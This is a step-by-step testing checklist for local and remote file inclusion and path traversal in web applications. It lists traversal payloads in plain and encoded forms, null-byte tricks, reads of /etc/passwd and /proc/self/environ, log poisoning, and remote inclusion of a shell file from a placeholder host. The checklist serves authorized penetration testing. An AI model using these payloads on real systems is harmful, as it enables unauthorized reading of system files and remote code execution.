Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

  1. Initial Information Gathering

    • Identify and map all endpoints that accept file path inputs.
    • Review source code (if available) to understand file handling mechanisms.
    • Check for endpoints where file paths are passed as parameters in URLs, headers, or body.

  2. Basic LFI Testing

    • ../../../../etc/passwd
    • ..%2F..%2F..%2F..%2Fetc%2Fpasswd
    • ../../../../../../../../../../../etc/passwd
    • Try to include different system files (e.g., /etc/hosts, /proc/version, C:\Windows\win.ini).

  3. Path Traversal

    • URL encoding: %2e%2e%2f, %2e%2e%2f
    • Double URL encoding: %252e%252e%252f
    • Unicode encoding: ..%c0%af..%c0%af..%c0%af
    • Test bypass techniques for traversal filters (e.g., using null bytes .%00, appending slashes).

  4. Advanced Path Traversal Techniques

    • Test for double encoding vulnerabilities.
    • Try bypassing filters with non-standard encodings and mixed encodings.
    • Use directory traversal sequences with variations like:
      • ....//
      • ....\/
      • %2e%2e%2f%2e%2e%2f

  5. File Inclusion and Execution

    • /etc/passwd (Linux)
    • /proc/self/environ
    • /proc/self/fd/0
    • C:\Windows\win.ini (Windows)
    • Test for inclusion of log files, configuration files, or other readable files.

  6. Null Byte Injection

    • /etc/passwd%00
    • C:\Windows\win.ini%00

  7. File Upload and Inclusion

    • Check if file upload functionalities are present and try uploading files for inclusion.
    • Test inclusion of uploaded files to execute code (e.g., web shells).

  8. Log Poisoning and Inclusion

    • Inject payload into User-Agent, Referer, or other headers.
    • Include poisoned log files to execute injected payloads.

  9. Remote File Inclusion (RFI)

    • Check if the application allows remote file inclusion.
    • Test including remote files via HTTP or FTP URLs:
      • http://example.com/shell.txt
      • ftp://example.com/shell.txt

  10. Error Handling and Response Analysis

    • Analyze server responses for clues about the presence of LFI vulnerabilities.
    • Look for error messages that disclose file paths or other sensitive information.
    • Verify if application stack traces are exposed in responses.